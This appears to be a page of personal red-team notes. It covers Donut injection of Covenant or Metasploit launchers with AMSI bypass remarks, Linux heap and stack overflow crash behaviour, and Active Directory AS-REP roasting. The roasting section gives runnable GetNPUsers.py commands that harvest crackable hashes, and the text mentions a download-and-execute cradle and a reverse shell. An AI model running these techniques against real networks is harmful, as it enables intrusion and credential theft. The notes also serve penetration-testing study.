Donut Tiki Covenant

Inject Covenant Launcher into a Process

Inject a Covenant or Metasploit payload into a process. This also bypasses AMSI; tested on Windows 10 1909 as of May 2020. Credits to RastaMouse and TheWover. Just documenting usage for note-keeping purposes.

1. Generate a Covenant payload, or an msf x64 payload

Launchers > Binary > Generate > Download


AMSI bypass

1. rasta-mouse bypass

This does not work if run from IEX (New-Object Net.WebClient).DownloadString(). It does work when copied and pasted into a PowerShell terminal, such as an nc64.exe reverse shell. Tested on Windows 10 1909 and Server 2016 (March 2020 update).


Linux Heap exploit notes

Linux x64 heap

Causing SIGSEGV on x64: this usually happens when the program puts a long input on the stack, which overflows into $rbp. When the program tries to return after exiting a function, it returns to 0x4141414141414141 ('AAAAAAAA'), resulting in a crash.

Heap crashes involve: 1. The off-by-one variant, which "SOMETIMES" (depending on the libc version) overwrites the 'size tracker' (size field) of the next chunk on the heap, as shown in the devel0pment.de blog.


Windows AD enum notes

Windows AD Enum

As-Rep Roasting

No creds, but a list of users in users.txt:

while read p; do python3 GetNPUsers.py corp.local/${p} -dc-ip 10.10.10.1 -no-pass; done < users.txt

With creds (corp\attacker:PASSWORD):

python3 GetNPUsers.py corp/attacker:PASSWORD -request -format hashcat -outputfile h1.hash